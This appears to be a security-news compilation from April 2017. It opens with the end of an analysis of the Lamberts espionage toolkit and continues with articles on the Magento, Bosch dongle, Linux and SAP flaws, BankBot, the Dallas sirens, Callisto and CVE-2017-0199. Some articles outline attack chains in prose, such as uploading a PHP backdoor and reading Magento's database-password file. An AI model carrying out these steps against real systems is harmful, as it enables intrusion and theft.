The Green Lambert family is the only one where non-Windows variants have been found. An old version of Green Lambert, compiled for OS X was uploaded from Russia to a multiscanner service in 2014. Its internal codename is HO BO (1.2.0).

The Windows versions of Green Lambert have the following code names: BEARD BLUE (2.7.1), GORDON FLASH (3.0), APE ESCAPE (3.0.2), SPOCK LOGICAL (3.0.2), PIZZA ASSAULT (3.0.5), and SNOW BLOWER (3.0.5).

Interestingly, one of the droppers of Green Lambert abused an ICS software package named “Subway Environmental Simulation Program” or “SES”, which has been available on certain forums visited by engineers working with industrial software. Similar techniques have been observed in the past from other threat groups, for instance, trojanized Oracle installers by the Equation group.

White Lambert

White Lambert is a family of tools that share the same internal description as Black Lambert. Known tool types, builds, and version names include:

ToolType “aa”, protocol 3, version 7, versionName 5.0.2, build 113140
ToolType “aa”, protocol 3, version 7, versionName 5.0.0, build 113140
ToolType “aa”, protocol 3, version 6, versionName 4.2.0, build 110836M
ToolType “aa”, protocol 3, version 5, versionName 3.2.0
One of the White Lambert samples is interesting because it has a forgotten PDB path inside, which points to “Archan~1l” and “Hudson”. Hudson could point to a project name, if the authors name their projects by rivers in the US, or, it could also be the developer’s first name. The truncated (8.3) path “archan~1” most likely means “Archangel”. The tool type “aa” could also suggest “ArchAngel”. By comparison, the Black Lambert tool type “wl” has no known meaning.

Unraveling the Lamberts Toolkit

White Lambert samples run in kernel mode and sniff network traffic looking for special packets containing instructions to execute. To run unsigned code in kernel mode on 64-bit Windows, White Lambert uses an exploit against a signed, legitimate SiSoftware Sandra driver. The same method was used before by Turla, ProjectSauron, and Equation’s Grayfish, with other known, legitimate drivers.

Pink Lambert

Pink Lambert is a suite of tools initially discovered on a White Lambert victim. It includes a beaconing implant, partially based on publicly available source code. The source code on top of which Pink Lambert’s beaconing implant was created is “A Fully Featured Windows HTTP Wrapper in C++”.

Unraveling the Lamberts Toolkit

Figure 6. “A Fully Featured Windows HTTP Wrapper” by shicheng

Other tools in the Pink Lambert suite include USB stealer modules and a very complex multi-platform orchestrator.

In a second incident, a Pink Lambert orchestrator was found on another White Lambert victim, substantiating the connection between the Pink and White Lamberts.

Gray Lambert

Gray Lambert is the most recent tool in the Lamberts’ arsenal. It is a network-driven backdoor, similar in functionality to White Lambert. Unlike White Lambert, which runs in kernel mode, Gray Lambert is a user-mode implant. The compilation and coding style of Gray Lambert is similar to the Pink Lambert USB stealers. Gray Lambert initially appeared on the computers of victims infected by White Lambert, which could suggest the authors were upgrading White Lambert infections to Gray. This migration activity was last observed in October 2016.

Some of the known filenames for Gray Lambert are mwapi32.dll and poolstr.dll – it should be pointed though that the filenames used by the Lamberts are generally unique and have never been used twice.

Timeline

Most of the Blue and Green Lambert samples have two C&C servers hardcoded in their configuration block: a hostname and an IP address. Using our own pDNS as well as DomainTools IP history, we plotted the times when the C&C servers were active and pointing to the same IP address as the one from the configuration block.

Unfortunately, this method doesn’t work for all samples, since some of them don’t have a domain for C&C. Additionally, in some cases we couldn’t find any pDNS information for the hostname configured in the malware.

Luckily, the attackers have made a few mistakes, which allow us to identify the activity times for most of the other samples. For instance, in case when no pDNS information was available for a subdomain on top of the main C&C domain, the domain registration dates were sufficient to point out when the activity began. Additionally, in some cases the top domain pointed to the same IP address as the one from the configuration file, allowing us to identify the activity times.

Another worthwhile analysis method focuses on the set of Blue Lambert samples that have exports. Although most compilation timestamps in the PE header appear to have been tampered (to reflect a 2003-2004 range), the authors forgot to alter the timestamps in the export section. This allowed us to identify not just the activity / compilation timestamps, but also the method used for faking the compilation timestamps in the PE header.

It seems the algorithm used to tamper with the samples was the following: subtract 0x10 from the highest byte of timestamp (which amounts to about 8 and half years) and then randomize the lowest 3 bytes. This way we conclude that for Blue Lamberts, that original compilation time of samples was in the range of 2012-2015.

Putting together all the various families, with recovered activity times, we come to the following picture:

Figure 8. A timeline of activity for known Lamberts

As it can be seen from the chart above, Green Lambert is the oldest and longest-running in the family, while Gray is the newest. White, Blue and Pink somehow overlap in deployment, with Blue replacing Green Lambert. Black Lambert was seen only briefly and we assume it was “retired” from the arsenal after being discovered by FireEye in 2014.

Codenames and Popular Culture Referenced in Lamberts

The threat group(s) behind the Lambert toolkits have used a large number of codenames extensively throughout their projects. Some of these codenames are references to old computer games, Star Trek, and cartoons, which is very unusual for high profile APT groups. We really enjoyed going through the backstories of these codenames and wanted to provide them below for others to enjoy as well.

For instance, one of the Green Lambert versions has the internal codename “GORDON FLASH”, which can also be read as “FLASH GORDON”. Flash Gordon is the hero of a space opera adventure comic strip created by and originally drawn by Alex Raymond. It was first published in 1934 and subsequently turned into a popular film in 1980.

Unraveling the Lamberts Toolkit

Flash Gordon poster

A ‘Funnel cake’ is a regional food popular in North America at carnivals, fairs, sporting events, and seaside resorts. This explains the codename “FUNNELCAKE CARNIVAL”:

Unraveling the Lamberts Toolkit

Figure 9. A typical funnel cake

Spock and Prosper obviously refers to Star Trek, the well-known science fiction television series created by Gene Roddenberry. Cdr. Spock is a half-Vulcan, half-human character, portrayed by Leonard Nimoy. “Live long and prosper” is the traditional Vulcan greeting in the series.

Unraveling the Lamberts Toolkit

Leonard Nimoy as “Spock” displaying the traditional Vulcan greeting “Live long and prosper”

Ringtoss is a game that is very popular at carnivals in North America.

Unraveling the Lamberts Toolkit

DOUBLESIDED SCOOBYSNACK is likely a reference to an NFL Lip Reading video featuring Adrian Peterson that went viral in mid-2013. According to the urban dictionary, it is also used to denote a sexual game in which the participants are dressed as Scooby-Doo and his master.

Ape Escape (also known as Saru Get You (サルゲッチュ Saru Getchu) in Japan) is a series of video games made by SCE Japan Studio, starting with Ape Escape for PlayStation in 1999. The series often incorporates ape-related humor, unique gameplay, and a wide variety of pop culture references; it is also notable for being the first game to make the DualShock or Dual Analog controller mandatory.

Ape Escape

INVERTED SHOT is likely a reference to a mixed martial arts move also known as an ‘Imanari roll takedown’, named after Masakazu Imanari who popularized the grappling technique. It consists of a modified Brazilian jiu-jitsu granby roll that places the fighter in inverted guard position while taking the opponent down to the mat.

GAI and SHU (as used in Green Lambert OS X) are characters from the Guilty Crown anime series. Gai Tsutsugami (恙神 涯 Tsutsugami Gai) is the 17-year-old resourceful and charismatic leader of the “Funeral Parlor” resistance group, while Shu Ouma (桜満 集 Ōma Shū) is the 17-year-old main protagonist of Guilty Crown.

Unraveling the Lamberts Toolkit

Figure 10. Main characters of Guilty Crown with Shu Ouma in the middle.

Conclusions

The Lamberts toolkit spans across several years, with most activity occurring in 2013 and 2014. Overall, the toolkit includes highly sophisticated malware, which relies on high-level techniques to sniff network traffic, run plugins in memory without touching the disk, and leverages exploits against signed drivers to run unsigned code on 64-bit Windows.

To further exemplify the proficiency of the attackers leveraging the Lamberts toolkit, deployment of Black Lambert included a rather sophisticated TTF zero day exploit, CVE-2014-4148. Taking that into account, we classify the Lamberts as the same level of complexity as Regin, ProjectSauron, Equation and Duqu2, which makes them one of the most sophisticated cyber espionage toolkits we have ever analysed.

Considering the complexity of these projects and the existence of an implant for OS X, we assume that it is highly possible that other Lamberts also exist for other platforms, such as Linux. The fact that in the vast majority of cases the infection method is unknown probably means there are still a lot of unknown details about these attacks and the group(s) leveraging them.

As usual, defense against attacks such as those from the Lamberts/Longhorn should include a multi-layered approach. Kaspersky products include special mitigation strategies against the malware used by this group, as well as the many other APT groups we track. If you are interested in reading more about effective mitigation strategies in general, we recommend the following articles:

Strategies for mitigating APTs
How to mitigate 85% of threats with four strategies
We will continue tracking the Lamberts and sharing new findings with our intel report subscribers, as well as with the general public. If you would like to be the first to hear our news, we suggest you subscribe to our intel reports.

Kaspersky Lab products successfully detect and eradicate all the known malware from the Lamberts family.


Unpatched Magento Flaw Exposes Online Stores to Attacks

14.4.2017 securityweek Vulnerebility
Magento, the popular e-commerce platform used by more than 250,000 merchants worldwide, is affected by a potentially serious vulnerability that can be exploited to hijack online stores, researchers warned.

The flaw was found by DefenseCode in November and reported to Magento via the company’s Bugcrowd-based bug bounty program. The vendor indicated at the time that it had been aware of the issue, but it still hasn’t addressed it. After its attempts to obtain a status update on the vulnerability failed, DefenseCode decided to make its findings public.

The vulnerability is related to a feature that allows users to add Vimeo video content for an existing product. When a video is added, Magento automatically retrieves a preview image via a POST request.

This request method can be changed from POST to GET, allowing an attacker to launch a cross-site request forgery (CSRF) attack and upload an arbitrary file. While invalid image files are not allowed, the file is still saved on the server before it is validated.

The location of the file can be easily determined, enabling a hacker to upload a malicious PHP script to the server. In order to achieve remote code execution, the attacker also needs to upload a .htaccess file to the same directory.

For the attack to work, a hacker needs to convince a user with access to the shop’s administration panel, regardless of their role and permissions, to access a specially crafted web page that triggers the CSRF attack.

Researchers warned that successful exploitation of the vulnerability can allow an attacker to take complete control of a targeted system, including gain access to sensitive customer information stored in the compromised store’s database.

“Full administrative access is not required to exploit this vulnerability as any Magento administrative panel user regardless of assigned roles and permissions can access the remote image retrieval functionality. Therefore, gaining a low privileged access can enable the attacker to compromise the whole system or at very least, the database (e.g. traversing to /app/etc/env.php to grab the database password),” DefenseCode wrote in its advisory.

The latest security updates were released by Magento developers in February, when they addressed a critical remote code execution vulnerability that allegedly affected only few systems.


Flaws in Bosch Car Dongle Allow Hackers to Stop Engine

14.4.2017 securityweek Vulnerebility
Vulnerabilities found by researchers in Bosch’s Drivelog Connect product can be exploited by hackers to inject malicious messages into a vehicle’s CAN bus. The vendor has implemented some fixes and is working on adding more attack protections.

Bosch’s Drivelog Connect is a service that provides information about the condition of a vehicle, including potential defects, service deadlines, and data on fuel consumption and driving behavior. The product includes a dongle called Drivelog Connector, which is connected to the car’s OBD2 diagnostics interface, and a mobile application that communicates with the dongle via Bluetooth.

Researchers at automotive cybersecurity firm Argus have identified some potentially serious vulnerabilities in the communications between the mobile app and the dongle.Vulnerabilities in Bosch’s Drivelog Connect

One of the security holes is related to the authentication process between the Drivelog Connector and the Drivelog Connect smartphone app. The app is available for both iOS and Android, but experts focused on the Android application. The second flaw affects the dongle’s message filter.

According to researchers, diagnostic messages can only be sent to the CAN bus using a valid service ID. However, this message filter can be bypassed by sending OEM-specific messages that can be obtained through CAN traffic monitoring or by fuzzing CAN bus messages.

An attack leveraging this message filter bypass can be launched by a hacker who has obtained root access to the targeted user’s smartphone. During the tests they conducted, Argus researchers said they managed to remotely stop the engine of a moving car by exploiting the vulnerability. They pointed out that, depending on the make and model of the car, other actions may have been possible.

This attack scenario requires root access to the Android device and a malicious patch to the mobile app. Car manufacturers have often pointed out that it’s difficult to prevent attacks once a smartphone has been compromised.

However, Argus researchers have found a way to launch attacks without this requirement. An information disclosure vulnerability in the authentication process between the app and the dongle allows an attacker to connect to a targeted device without hacking the phone first.

During the authentication process, the dongle sends any connecting Android device various pieces of information that can be used to obtain the user-supplied authorization PIN. The PIN can be brute-forced offline – the attack takes up to 30 minutes on a modern laptop – and it can then be used to connect to the dongle.

Once the connection has been completed, the attacker can send malicious CAN bus messages from their own device, instead of having to hijack the targeted user’s smartphone. This attack is mitigated by the fact that the hacker needs to be in Bluetooth range of the targeted vehicle.

In an advisory it published this week, Bosch said it addressed the authentication vulnerability on the server side by introducing two-step verification when additional users are registered to a device. The company is also working on a firmware update for the dongle to prevent attackers from sending unauthorized CAN messages from a hijacked mobile app.


Android Trojan Targeting Over 420 Banking Apps Worldwide Found On Google Play Store
14.4.2017 thehackernews Android


Do you like watching funny videos online?
I am not kind of a funny person, but I love watching funny videos clips online, and this is one of the best things that people can do in their spare time.
But, beware if you have installed a funny video app from Google Play Store.
A security researcher has discovered a new variant of the infamous Android banking Trojan hiding in apps under different names, such as Funny Videos 2017, on Google Play Store.
Niels Croese, the security researcher at Securify B.V firm, analyzed the Funny Videos app that has 1,000 to 5,000 installs and found that the app acts like any of the regular video applications on Play Store, but in the background, it targets victims from banks around the world.
This newly discovered banking Trojan works like any other banking malware, but two things that makes it different from others are — its capability to target victims and use of DexProtector tool to obfuscate the app's code.

Dubbed BankBot, the banking trojan targets customers of more than 420 banks around the world, including Citibank, ING, and some new Dutch banks, like ABN, Rabobank, ASN, Regiobank, and Binck, among many others.
How Android Banking Trojan Works
In a nutshell, BankBot is mobile banking malware that looks like a simple app and once installed, allows users to watch funny videos, but in the background, the app can intercept SMS and display overlays to steal banking information.
Mobile banking trojan often disguises itself as a plugin app, like Flash, or an adult content app, but this app made its way to Google Play Store by disguising itself as any other regular Android app.
Google has removed this malicious app from its Play Store after receiving the report from the researcher, but this does not mean that more such apps do not exist there with different names.
"Another problem is that Google [Play Store] mainly relies on automated scanning without a full understanding of the current obfuscation vectors resulting in banking malware on the Google Play Store." researcher told The Hacker News.
Once downloaded, the app persistently requests administrative rights, and if granted, the banking malware can control everything that's happening on an infected smartphone.
The BankBot springs into action when the victim opens any of the mobile apps from a pre-configured list of 425 banking apps. A complete list of banks a BankBot variant is currently imitating can be found on the blog post published by the researcher.
Once one of the listed apps is opened, BankBot immediately displays an overlay, which is a page on the top of legitimate mobile banking app and tricks Android users entering their banking credentials into the overlay, just like a phishing attack.
This will not only sends your banking credentials to your bank’s servers but also sends your financial credentials to the server controlled by fraudsters.
This social engineering technique is often used by financially motivated criminals to deceive users into giving up their personal details and sensitive banking information to fraudsters.
How to protect yourself?
There are standard protection measures you need to follow to remain unaffected:
Install a good antivirus app that can detect and block such malware before it can infect your device. Always keep the app up-to-date.
Always stick to trusted sources, like Google play Store and the Apple App Store, and verify app permissions before installing apps. If any app is asking more than what it is meant for, just do not install it.
Do not download apps from third party source. Although in this case, the app is being distributed through the official Play Store, most often such malware are distributed via untrusted third-party app stores.
Avoid unknown and unsecured Wi-Fi hotspots and Keep your Wi-Fi turned OFF when not in use.
Be careful which apps you give administrative rights to. Admin rights are powerful and can give an app full control of your device.
Never click on links in SMS or MMS sent to your mobile phone. Even if the email looks legit, go directly to the website of origin and verify any possible updates.


 


Here's How Hacker Activated All Dallas Emergency Sirens On Friday Night
14.4.2017 thehackernews Incindent
Last weekend when outdoor emergency sirens in Dallas cried loudly for over 90 minutes, many researchers concluded that some hackers hijacked the alarm system by exploiting an issue in a vulnerable computer network.
But it turns out that the hackers did not breach Dallas' emergency services computer systems to trigger the city's outdoor sirens for tornado warnings and other emergencies, rather they did it entirely on radio.
According to a statement issued on Monday, Dallas City Manager T.C. Broadnax clarified the cause of the last Friday's chaos, saying the "hack" used a radio signal that spoofed the system used to control the siren network centrally.
"I don't want someone to understand how it was done so that they could try to do it again," Broadnax said without going much into details. "It was not a system software issue; it was a radio issue."
First installed in 2007, the Dallas outdoor emergency warning system powers 156 sirens made by a company called Federal Signal.

The city officials did not provide details on how the Emergency Alert System (EAS) works, but noted that "it's a tonal-type system" that's usually controlled by tone combinations used by the EAS broadcast over the National Weather Service's weather radio, and by Dual-Tone Multi-Frequency (DTMF) or Audio Frequency Shift Keying (AFSK) encoded commands from a command center terminal sent over an emergency radio frequency.
The Federal Communications Commission (FCC) currently has the 700MHz range of radio frequency reserved for US public safety.
This suggests that the emergency system could be compromised by outside radio equipment replicating the tonal code required to trigger the alarms — which, in other words, is known as a "radio replay" attack.
It is believed that the hacker who managed to trigger alarm last Friday somehow managed to gain access to the siren system documentation to know the exact tonal commands that trigger an alarm, and then just played that command signal repeatedly.
According to the city officials, the decade-old radio-based system was disabled hours after the breach and went live over the weekend with encryption to protect the language of tones as a measure to prevent such attacks.
The Dallas City Council has also voted to pay $100,000 more to its emergency siren system contractor to increase the security of the city's current system.


CVE-2016-10229 Linux remote code execution flaw potentially exposes systems at risk of hack
14.4.2017 securityaffairs  Vulnerebility

The Linux remote vulnerability tracked as CVE-2016-10229 poses Linux systems at rick of hack if not patched.
A Linux kernel vulnerability, trackers as CVE-2016-10229, potentially allows attackers to remotely take over a vulnerable system (i.e. Servers, desktops, IoT devices and mobile devices).

“udp.c in the Linux kernel before 4.5 allows remote attackers to execute arbitrary code via UDP traffic that triggers an unsafe second checksum calculation during execution of a recv system call with the MSG_PEEK flag.” reads the description of the flaw published by the NDV.

The CVE-2016-10229 flaw expose systems to attacks via UDP traffic, according to the experts. the attackers can potential hack a system running a software receiving data through the system call recv() with the MSG_PEEK flag set on. This means that attackers would send to the target specifically crafted packets that trigger the CVE-2016-10229 flaw by forcing a second checksum operation on the incoming data. In this way, the attacker can execute malicious code within the kernel with root privileges, fortunately the issue is hard to exploit as explained by the popular Google Project Zero hacker Tavis Ormandy.

16h
Dan Rosenberg @djrbliss
I have reviewed the relevant code and I mostly understand it, but I'm missing the security ramifications.
Follow
Tavis Ormandy ✔ @taviso
@djrbliss I'm as confused as you are...
7:18 PM - 13 Apr 2017
4 4 Retweets 17 17 likes
Common software, like the Nginx web server, set the MSG_PEEK flag on some connections, potentially exposing the system to the attack.

The bug can also be potentially exploited by a local attacker to escalate privileges.

The vulnerability was discovered by the expert from Google Eric Dumazet who explained that the issue dates back the end of 2015 when a small fix was applied to the Linux kernel.

Affected versions are the Kernel versions below 4.5, all the way down to 2.6, are likely at risk, major Linux distribution such as Ubuntu and Debian were distributing fixed builds of the kernel by February this year.

According to Red Hat, it Linux distribution were never affected by the CVE-2016-10229 flaw.

CVE-2016-10229

Google has already rolled out security patches for Android that also fixed the CVE-2016-10229 in mobile devices.

“So, in short, yes, there is a remote kernel-level code execution vulnerability in Linux, which sounds like the worst of the very worst, but it is pretty much patched by now – and it appears to be tricky to exploit. It was silently addressed in the kernel source over a year ago, and fixed in updates to machines earlier this year, but only now has it come to wider attention.” reported The Register.


Hundreds of thousands Magento e-shops are exploited to hack due to an unpatched flaw
14.4.2017 securityaffairs  Vulnerebility

An unpatched vulnerability in Magento platform could be exploited by hackers to compromise fully web servers that host the e-commerce sites.
An unpatched vulnerability in the Magento e-commerce platform could be exploited by attackers to upload and execute malicious PHP scripts on web servers that host online shops.

The vulnerability was reported by experts at the security firm DefenseCode, the issue resides in a feature that was implemented to retrieves preview images for Vimeo videos. The feature was implemented to allow Magento admins to add videos to product listings.

The experts noticed that if the image URL references a different file, such as a PHP script, Magento will download the file to validate it. If the file is not an image, Magento will display the message “Disallowed file type”, leaving it on the server.

An attacker triggering the vulnerability could remotely execute code by first tricking Magento to download an .htaccess configuration file that enables PHP execution inside the download directory and then downloading a malicious PHP script that can work as a backdoor.

At this point it is possible to access the backdoor by accessing it via the browser, the experts explained that the attacker can exploit the script to browse the server directories and read the database password from Magento’s configuration file.

The vulnerability could be exploited only by an authenticated attacker, even if it is a lower-privileged user.

The experts added that if the Magento e-shop doesn’t have the “Add Secret Key to URLs” option turned on, the attacker can launch a cross-site request forgery (CSRF) attack to force a user’s browser to perform an unauthorized request on a website when visiting a different one.

The attacker can hack the Magento shop by tricking the victims into clicking on a link shared by mail or by visiting a specifically crafted web page.

The attack will work against all the users who have active Magento sessions in their browser, exploiting this attack vector hackers might take over users’ accounts.

“By changing the request method from POST to GET, a lack of a form_key parameter which serves as a CSRF token will be ignored and thus enable cross-site request forgery (CSRF) attacks.” reads the advisory published by DefenseCode.

“The attack can be constructed as simple as “

DefenseCode reported these issues to the Magento development team in November, but the flaws are still unpatched and almost all the the Magento CE versions are affected.

Below the disclosure Timeline
11/18/2016 Vendor contacted via BugCrowd platform
11/18/2016 Vendor responded – aware of issue
04/11/2017 Vendor contacted again without response
04/13/2017 Advisory released to the public
In order to mitigate the attack, experts suggest enforcing the use of ‘Add Secret Key to URLs’


Targeted Malware Inflated With Junk Data to Avoid Detection

13.4.2017 securityweek Virus
A piece of malware used in targeted attacks aimed at South Korea and Japan is inflated with junk data in an effort to avoid detection. While the technique is not exactly new, researchers at Kaspersky Lab believe this particular malware is noteworthy.

The security firm came across the malware while analyzing attacks involving a malware toolkit dubbed “XXMM.” The threat, disguised as a file named srvhost.exe in an effort to avoid raising suspicion, had a size of more than 100 Mb.

Kaspersky’s investigation has revealed that the malware is a Trojan loader designed to activate a backdoor called “wali” by its author. The backdoor module is injected into the iexplore.exe process by the loader.

The size of malware samples typically ranges between a few kilobytes and a few megabytes, depending on how they are packaged. Cybercriminals have also been known to hide malware in movie or ISO files, which can result in malware that has a size of hundreds of megabytes or even a few gigabytes.

What makes Wali interesting is the fact that it’s not delivered as a 100 Mb file. The initial loader is roughly 1 Mb in size, but its two dropper components append tens of megabytes of garbage data to the final malware executable file.

Since the junk data is created dynamically by the droppers, the size of the malware file can vary. Kaspersky has seen both 50 Mb and 100 Mb samples in real world attacks, but experts have also observed a 200 Mb sample generated using the same technique.

Researchers believe this is also a noteworthy threat due to the fact that it has been used in targeted attacks.

“While this technique may seem inefficient in its primitive approach to bypass detection, we believe that in certain cases this malware may stay below the radar of incident responders and forensic analysts who use YARA rules to scan hard drives,” explained Kaspersky’s Suguru Ishimaru.

“The reason is that one of the common practices for YARA rule authors is to limit the size of scanned files, which is aimed mainly at improving performance of the scanning process. Large files, like the ones produced by XXMM malware, may become invisible for such rules, which is why we would like to recommend security researchers to consider this when creating rules for dropped malwares,” the expert added.


"Callisto" Cyberspies Target Europe, South Caucasus

13.4.2017 securityweek CyberSpy
F-Secure on Thursday published a report detailing the activities of Callisto, a threat actor whose primary goal appears to be intelligence gathering from entities interested in European foreign and security policy.

According to F-Secure, which hasn’t found any links between this and other known threat actors, the Callisto group has been active since at least October 2015. The hackers have been observed targeting various individuals and organizations in Eastern Europe and the South Caucasus region, which encompases Georgia, Armenia and Azerbaijan.

In late 2015, when F-Secure started tracking Callisto, the group had sent out highly targeted Gmail phishing emails. Some of the messages were sent to personal email addresses, suggesting that the attackers had previously conducted reconnaissance. Experts believe the hackers managed to hijack some accounts and used them to send phishing emails to other targets.

In early 2016, the cyberspies sent spear-phishing emails carrying malicious documents to military and government officials, think tank employees and journalists. F-Secure is aware of the malicious emails sent to these individuals, but it’s unclear if the targets actually installed the malware on their systems.

The Word documents sent to targets embedded a piece of malware as an object, eliminating the need for using exploits. If recipients clicked on the document and allowed the package content to run when prompted, the malware would be executed.

The malware has been identified as Scout, one of the tools available in the RCS Galileo platform of Italian spyware maker Hacking Team. The company was hacked back in 2015 and many of its tools were leaked online. Researchers determined that the Callisto group used the installers that had been leaked at the time, rather than relying on the Galileo source code.

The Scout malware has been described as a light backdoor that can be used for reconnaissance and to install other malware on the infected system.

F-Secure’s analysis revealed that the Callisto group’s infrastructure had been linked to servers hosting stores that sell controlled substances, which suggests a possible cybercrime connection. Experts also discovered links between the infrastructure used by the threat actor and countries such as Russia, Ukraine and China.

“A cyber crime group with ties to a nation state, such as acting on behalf of or for the benefit of a government agency, is one potential explanation,” researchers said in their report. “However, we do not believe it is possible to make any definitive assertions regarding the nature or affiliation of the Callisto Group based on the currently available information.”

While F-Secure has not seen any Callisto attacks involving malware for more than a year, the security firm says the group is still active, with new phishing infrastructure set up every week.

It’s worth pointing out that the Russia-linked threat actor dubbed APT28, Pawn Storm and Fancy Bear has also been known to target entities in Eastern Europe and the Caucasus region.


Microsoft Kills Support for Windows Vista

13.4.2017 securityweek Security
While expected for some time, Microsoft this week ended support for its Windows Vista operating systems. The change entered into effect on April 11, the very same day Microsoft began rolling out Windows 10 Creators Update to its users.

Windows Vista has been receiving software updates for the past 10 years, but Microsoft has decided that the time has come to move on.

“As of April 11, 2017, Windows Vista customers are no longer receiving new security updates, non-security hotfixes, free or paid assisted support options, or online technical content updates from Microsoft,” the company notes on its support website.

Data coming from netmarketshare shows that the move would impact only 0.72% of all desktop users out there, but that is still a significant figure, considering that many of the Windows Vista computers are used within business environments.

A November report from Duo Security revealed that 65% of the security company’s clients' Windows users were using Vista. The threat this poses to enterprise networks is amplified by the continuous use of an even older operating system within business environments: Windows XP. The platform currently has 7.44% of the desktop operating system market, yet it hasn’t received updates since 2014.

Now that support has ended, Windows Vista will continue to work as before, only that it will become increasingly vulnerable to security risks and malware. What’s more, Internet Explorer 9, which runs on Vista, isn’t supported either, meaning that users are exposed to additional threats when browsing the web using this application.

“Also, as more software and hardware manufacturers continue to optimize for more recent versions of Windows, you can expect to encounter more apps and devices that do not work with Windows Vista,” Microsoft says.

In fact, major browser makers have already announced their end of support for the platform. Mozilla revealed in December 2016 that it would no longer support Vista and XP starting this year, while Google’s Chrome 49 was the last browser iteration released for the two platforms. Gmail isn’t offering support for the operating systems either, after it dropped support for Chrome 53 and older versions in February.

To further determine users to move away from Windows Vista, Microsoft also stopped providing Microsoft Security Essentials for download on this platform. Antimalware signature updates will continue to arrive for installed instances for a limited time, after which users will remain exposed to newer threats.

“Please note that Microsoft Security Essentials (or any other antivirus software) will have limited effectiveness on PCs that do not have the latest security updates. This means that PCs running Windows Vista will not be secure and will still be at risk for virus and malware,” Microsoft notes.


CVE-2017-0199 Zero Day exploit used to deliver FINSPY spyware
13.4.2017 securityaffairs Vulnerebility

Security researchers at FireEye discovered that the Microsoft Word CVE-2017-0199 exploit was linked to cyberspying in Ukraine conflict.
The zero-day vulnerability in Microsoft Office that was recently fixed by Microsoft was used to deliver a surveillance malware to Russian-speaking targets.

Security experts from firm FireEye spotted the targeted attacks leveraging specifically crafted Microsoft Word documents that pretend to be a Russian military training manual.

CVE-2017-0199

When the victim opened the document, the attacks starts and a the surveillance malware FinSpy is delivered, the malware is developed by a subsidiary of Gamma Group. Officially the software would be offered for sale only to Government agencies and law enforcement bodies, but privacy advocate speculate the spyware of also sold to authoritarian regime.

“FireEye assesses with moderate confidence that CVE-2017-0199 was leveraged by financially motivated and nation-state actors prior to its disclosure.” reads the analysis published by FireEye. “Actors leveraging FINSPY and LATENTBOT used the zero-day as early as January and March, and similarities between their implementations suggest they obtained exploit code from a shared source. Recent DRIDEX activity began following a disclosure on April 7, 2017.”

The experts are still investigating who is the final target of the attacks, however, the decoy document appears to have been published in the Donetsk People’s Republic, a breakaway region in Ukraine that’s received Russian support.

“As early as Jan. 25, 2017, lure documents referencing a Russian Ministry of Defense decree and a manual allegedly published in the “Donetsk People’s Republic” exploited CVE-2017-0199 to deliver FINSPY payloads. Though we have not identified the targets, FINSPY is sold by Gamma Group to multiple nation-state clients, and we assess with moderate confidence that it was being used along with the zero-day to carry out cyber espionage.” continues FireEye.

“The malicious document, СПУТНИК РАЗВЕДЧИКА.doc (MD5: c10dabb05a38edd8a9a0ddda1c9af10e), is a weaponized version of a widely available military training manual (Figure 1). Notably, this version purports to have been published in the “Donetsk People’s Republic,” the name given to territory controlled by anti-Kyiv rebels in Eastern Ukraine.”

The weaponized Russian training manual can download additional payloads along with another fake document claiming to be a Russian decree approving a forest management plan.

FireEye experts suspect a non-state actor may have hacked targets operating like government operators using the FinSpy software.

It is also possible that the zero-day exploit circulated in the cyber criminal underground, in March, a separate attack triggering the same flaw was spotted by the experts.

“As early as March 4, 2017, malicious documents exploiting CVE-2017-0199 were used to deliver the LATENTBOT malware. The malware, which includes credential theft capability, has thus far only been observed by FireEye iSIGHT Intelligence in financially motivated threat activity. Additionally, generic lures used in this most recent campaign are consistent with methods employed by financially motivated actors.” adds FireEye.

Likely different hacking groups may have obtained the zero-day knowledge from the same source.


SAP Patches Critical Code Injection Flaw in TREX

13.4.2017 securityweek Vulnerebility

SAP this week released its April 2017 set of patches. The most important of the 15 security notes resolves a Very High priority (Hot News) vulnerability in TREX / BWA that could allow an attacker to execute commands on the affected system.

Carrying a CVSS score of 9.4, and discovered by ERPScan, the note is the third in a series of patches that SAP has been releasing for NetWeaver Search and Classification (TREX) and NetWeaver Business Warehouse Accelerator (BWA) since December 2015, to prevent remote command execution. The issue was initially addressed with SAP Note 2234226, which was later updated with SAP Note 2273881, and now patched with SAP Note 2419592.

Onapsis, the firm that discovered the original vulnerability in 2015, explains that TREXNet, the internal communication protocol developed for TREX service, does not enforce any kind of authentication, but is required by TREX servers. This means that it exposes systems to malicious actors, who can remotely execute critical system and OS commands.

According to ERPScan, a company that specializes in securing SAP and Oracle products, because TREX is deployed in over a dozen SAP products, including SAP HANA, this vulnerability is considered one of the most widespread and severe SAP server-side issues. What’s more, the advisory with all the details was available on the web for 2 years, thus exposing numerous applications to attacks, ERPScan says.

“I reversed a protocol for HANA and then for the TREX search engine. As they share a common protocol, the exploit has been easily adapted. SAP fixed some features, but not everything affecting the core protocol. It was still possible to get full control on the server even with a patched TREX,” Mathieu Geli, Head of SAP Threat Intelligence at ERPScan and the researcher who discovered the issue, explains.

SAP’s April 2017 advisory reveals that three of the 15 security notes included in this month’s Security Patch Day were updates to previous notes, including one to a Remote Code Execution vulnerability in SAP GUI for Windows. Four of the security notes had a High severity rating, 8 were rated Medium risk, and two were considered Low severity.

ERPScan, on the other hand, says that there were 12 additional security notes included in this set of patches, for a total of 27 notes (17 SAP Security Patch Day Notes and 10 Support Package Notes).

7 of the patches were Missing Authorization Checks, 4 were Cross-Site request forgery, 3 Cross-Site Scripting, 2 Remote Code Execution (RCE), 2 XML external entity, 2 information disclosure, 2 denial of service, 1 open redirect, 1 buffer overflow, 1 directory traversal, and 2 other flaws.

In addition to the RCE flaw in TREX / BWA, SAP addressed three more vulnerabilities found by ERPScan researchers: a Cross-Site Scripting vulnerability in SAP NetWeaver Central Technical Configuration (CVSS Base Score: 6.3), a Cross-Site Scripting vulnerability in SAP NetWeaver Java Archiving Framework (CVSS Base Score: 6.1), and an XML external entity vulnerability in SAP Knowledge Management ICE Service (CVSS Base Score: 4.9).

Other critical issues SAP resolved this month include a Denial of service vulnerability in SAP SAPLPD (CVSS Base Score: 7.5), an XML external entity vulnerability in SAP Web Dynpro Flash Island (CVSS Base Score: 7.5), and a Missing authorization check vulnerability in SAP NetWeaver ADBC Demo Programs (CVSS Base Score: 6.3).

“After a pretty significant March Update, which included the highest critical note of the year (SAP HANA Self Service Vulnerability with CVSS 9.8 and other relevant High Priority notes) this is the second month with remote code injection vulnerabilities present. As a result, SAP Security Note #2419592 should be prioritized among the others as it implies a similar attack as the two others previously mentioned that impact TREX,” Onapsis says.


Juniper Networks Patches Several Flaws With Junos Updates

13.4.2017 securityweek Vulnerebility
